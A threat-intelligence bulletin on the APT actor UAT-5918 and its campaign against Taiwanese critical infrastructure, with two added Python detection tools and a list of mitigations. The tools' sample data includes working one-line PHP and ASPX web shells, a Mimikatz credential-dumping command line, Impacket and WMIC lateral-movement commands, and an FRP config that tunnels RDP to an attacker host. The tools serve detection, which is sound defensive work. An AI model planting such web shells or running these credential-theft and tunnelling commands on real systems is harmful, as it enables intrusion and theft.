UAT-5918 Targets Taiwan's Critical Infrastructure Using Web Shells and Open-Source Tools

Summary:
Cisco Talos researchers have identified a previously unknown threat actor, tracked as UAT-5918, that has been targeting critical infrastructure in Taiwan since at least 2023. The group is assessed to be an advanced persistent threat actor focused on establishing long-term access to victim environments for espionage and data theft. Beyond critical infrastructure, UAT-5918 has also targeted organizations in information technology, telecommunications, academia, and healthcare. Its operations are characterized by the use of web shells and open-source tools for post-compromise activity, including credential harvesting and the establishment of persistence across multiple entry points. Once inside a network, UAT-5918 uses tools such as Fast Reverse Proxy (FRP) and Neo-reGeorg to build reverse proxy tunnels, giving it remote access to compromised systems from attacker-controlled hosts.

Initial access is typically gained by exploiting N-day vulnerabilities (publicly known but unpatched flaws) in internet-exposed web and application servers. From there, UAT-5918 deploys a range of open-source tools to perform system reconnaissance, gather host and network information, and move laterally within the environment. The tools used for credential theft include Mimikatz and LaZagne, along with a browser credential extractor named BrowserDataLite, which collects login credentials, cookies, and browsing history from local web browsers. Once credentials are obtained, the group expands its reach across the network over RDP, WMIC, and Impacket.
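The lateral-movement and credential-theft tooling described above leaves recognisable traces in process-creation telemetry. The following detection logic is an added example written for this page; it is not Talos tooling and not part of the original report. It runs four rules over constructed process-creation records shaped like Sysmon Event ID 1 fields (Computer, ParentImage, Image, CommandLine): a web server worker spawning a shell or recon binary, the Impacket wmiexec output-redirect pattern under WmiPrvSE.exe, a remote process creation via WMIC /node:, and Mimikatz module names on a command line. The hostnames, paths and command lines in the sample are invented for the example.

```python
import re

# Constructed process-creation records shaped like Sysmon Event ID 1 fields.
# None of these come from a real incident; hosts and paths are invented.
SAMPLE_EVENTS = [
    {"id": 1, "Computer": "WEB01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami /all"},
    # Benign: ASP.NET compiling a page is a normal child of the IIS worker.
    {"id": 2, "Computer": "WEB01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": "csc.exe /t:library /out:App_Web.dll"},
    {"id": 3, "Computer": "FILE02", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c net user svc_backup /domain 1> \\127.0.0.1\ADMIN$\__1710000000.12 2>&1"},
    {"id": 4, "Computer": "WEB01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:FILE02 /user:corp\svc_backup process call create "cmd.exe /c dir \\FILE02\share$"'},
    {"id": 5, "Computer": "WEB01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\Temp\upd.exe",
     "CommandLine": "upd.exe privilege::debug sekurlsa::logonpasswords exit"},
    # Benign: an administrator opening a shell from Explorer.
    {"id": 6, "Computer": "ADM01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    # Benign: a WMI-launched task without the wmiexec output redirect.
    {"id": 7, "Computer": "FILE02", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c gpupdate /force"},
]

# Web server worker processes and the shells/recon tools a web shell typically runs.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat8.exe", "tomcat9.exe"}
SHELLS_AND_RECON = {"cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe", "net.exe", "net1.exe",
                    "ipconfig.exe", "nltest.exe", "certutil.exe", "wmic.exe"}

# Impacket's wmiexec runs each command as
#   cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1
# under WmiPrvSE.exe; the redirect into the local ADMIN$ share is the giveaway.
WMIEXEC_REDIRECT = re.compile(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\d", re.I)
# wmic.exe creating a process on another host.
WMIC_REMOTE_CREATE = re.compile(r"/node:\S+.*process\s+call\s+create", re.I)
# Mimikatz module prefixes survive renaming the binary (here "upd.exe").
MIMIKATZ_MODULES = re.compile(r"\b(?:sekurlsa|lsadump|privilege)::", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_webshell_child(ev: dict) -> bool:
    return basename(ev["ParentImage"]) in WEB_WORKERS and basename(ev["Image"]) in SHELLS_AND_RECON


def rule_wmiexec(ev: dict) -> bool:
    return (basename(ev["ParentImage"]) == "wmiprvse.exe"
            and basename(ev["Image"]) == "cmd.exe"
            and WMIEXEC_REDIRECT.search(ev["CommandLine"]) is not None
            and "2>&1" in ev["CommandLine"])


def rule_wmic_remote_create(ev: dict) -> bool:
    return basename(ev["Image"]) == "wmic.exe" and WMIC_REMOTE_CREATE.search(ev["CommandLine"]) is not None


def rule_mimikatz_cmdline(ev: dict) -> bool:
    return MIMIKATZ_MODULES.search(ev["CommandLine"]) is not None


RULES = {
    "webshell_child_process": rule_webshell_child,
    "impacket_wmiexec": rule_wmiexec,
    "wmic_remote_process_create": rule_wmic_remote_create,
    "mimikatz_module_in_cmdline": rule_mimikatz_cmdline,
}


def detect(events: list) -> list:
    """Return (event id, host, rule name) for every rule that fires on each event."""
    return [(ev["id"], ev["Computer"], name)
            for ev in events
            for name, rule in RULES.items()
            if rule(ev)]


if __name__ == "__main__":
    for event_id, host, rule in detect(SAMPLE_EVENTS):
        print(f"event {event_id} on {host}: {rule}")
```

The benign records (ASP.NET compilation under w3wp.exe, a WMI task without the ADMIN$ redirect) show why the rules key on parent/child pairs and command-line structure rather than on process names alone; an operator who renames mimikatz.exe still types its module names, but one who obfuscates the command line will slip past the last rule, so these are hunting leads, not a substitute for credential-access telemetry such as LSASS handle monitoring.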

Security Officer Comments:
The actor also makes heavy use of web shells to maintain persistence, notably the Chopper web shell, alongside the Crowdoor and SparrowDoor backdoors, both of which have been associated in past campaigns with Earth Estries, another China-linked group. This overlap in tooling and techniques points to tactical similarities between UAT-5918 and other China-based actors such as Volt Typhoon, Flax Typhoon, Tropic Trooper, and Dalbit. Post-compromise activity appears to be carried out manually: the group drops web shells across discovered subdomains and other internet-accessible infrastructure to create redundant access points, and conducts systematic data theft by enumerating local and shared drives for files of interest.

According to the researchers, the group's primary motivation appears to be intelligence collection rather than disruption, and the use of manual techniques during post-exploitation indicates a high degree of operator control and targeting precision.

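Because the actor seeds web shells across every reachable web root and stages FRP for its tunnels, a disk-level sweep is a practical complement to process telemetry. The scanner below is an added example for this page, not Talos code and not a signature set from the report. It flags one-line Chopper-style shells (script code that feeds request input straight into an eval primitive) in web script files, and frp client configuration files by their "server_addr" (frpc.ini) or "serverAddr" (frpc.toml) keys anywhere in the tree. The sample directory it builds is constructed for the example; 203.0.113.10 is an RFC 5737 documentation address standing in for an attacker-controlled host.

```python
import re
import tempfile
from pathlib import Path

# One-line "Chopper"-style web shells hand request-supplied input straight to an
# eval/execute primitive. These regexes catch the plain ASPX/PHP/JSP forms; a hit
# is a strong lead but still needs review, since obfuscated shells will not match
# and some legitimate code calls eval().
WEBSHELL_PATTERNS = {
    "php_eval_request": re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I),
    "aspx_jscript_eval_request": re.compile(r"eval\s*\(\s*Request\s*(?:\.Item)?\s*[\[(]", re.I),
    "jsp_exec_request": re.compile(r"getRuntime\(\)\s*\.exec\s*\(\s*request\.getParameter", re.I),
}

# frp client configs: frpc.ini uses "server_addr", frpc.toml uses "serverAddr".
# Either one in a web root, temp or user directory is a tunnel indicator.
FRP_CONFIG_PATTERN = re.compile(r"^\s*(?:server_addr|serverAddr)\s*=", re.I | re.M)

WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".asmx", ".jsp", ".jspx"}
MAX_BYTES = 1024 * 1024  # web shells and configs are tiny; skip large binaries


def classify_file(path: Path) -> list:
    """Return the sorted names of every indicator that matches this file."""
    if not path.is_file() or path.stat().st_size > MAX_BYTES:
        return []
    text = path.read_text(encoding="utf-8", errors="ignore")
    hits = []
    if path.suffix.lower() in WEB_EXTENSIONS:
        hits += [name for name, rx in WEBSHELL_PATTERNS.items() if rx.search(text)]
    if FRP_CONFIG_PATTERN.search(text):
        hits.append("frp_client_config")
    return sorted(hits)


def scan_tree(root: Path) -> dict:
    """Walk root and map each flagged file (relative POSIX path) to its hits."""
    findings = {}
    for path in sorted(root.rglob("*")):
        hits = classify_file(path)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample tree (not files from any incident).
SAMPLE_FILES = {
    "wwwroot/index.aspx": '<%@ Page Language="C#" %><html><body>Portal</body></html>',
    "wwwroot/img/upload.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "wwwroot/cache/c.php": "<?php @eval($_POST['cmd']); ?>",
    "users/public/frpc.toml": ('serverAddr = "203.0.113.10"\nserverPort = 7000\n\n'
                               '[[proxies]]\nname = "rdp"\ntype = "tcp"\n'
                               'localPort = 3389\nremotePort = 6000\n'),
    "users/public/notes.txt": "server maintenance window: saturday 02:00\n",
}


def build_sample_tree(root: Path) -> None:
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")


def run_demo() -> dict:
    """Build the constructed tree in a temp directory and scan it."""
    root = Path(tempfile.mkdtemp(prefix="webshell_hunt_"))
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in run_demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

On a real host point scan_tree at the web roots and at temp and profile directories, and treat the frp proxy definition in the sample (a local 3389 exposed as a remote port) as the shape to expect: it is exactly how a reverse proxy tunnel gives the actor RDP into a host that is not itself internet-facing.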
Suggested Corrections:

Organizations can make APT groups’ lives more difficult. Here’s how:
  • Patch internet-exposed servers first: UAT-5918’s initial access depends on N-day flaws in web and application servers, so prioritize patching externally reachable systems, inventory subdomains and other exposed infrastructure the actor could seed with redundant web shells, and review web roots for unexpected script files.
  • Defense-in-depth strategy: A layered defense remains the baseline against APTs: strong perimeter defenses, network segmentation, endpoint protection, intrusion detection systems, data encryption, access controls, and continuous monitoring for anomalies. Given this actor’s tradecraft, monitoring should specifically cover web server processes spawning shells, reverse proxy tunnels such as FRP and Neo-reGeorg, credential-dumping tools, and lateral movement over RDP and WMI.
  • Threat intelligence and sharing: Organizations should actively participate in threat intelligence sharing communities and collaborate with industry peers, government agencies, and security vendors. Sharing information about APTs and their techniques helps detect and mitigate attacks earlier.
  • Employee education and awareness: Regular security awareness programs, phishing simulations, and training sessions keep employees current on the latest threats, social engineering techniques, and safe computing practices.
  • Incident response and recovery: Regardless of preventive measures, organizations should have a well-defined incident response plan covering detection, containment, eradication, and recovery, so that the impact of an APT intrusion is minimized and normal operations can be restored.

Link(s):
https://thehackernews.com/2025/03/uat-5918-targets-taiwans-critical.html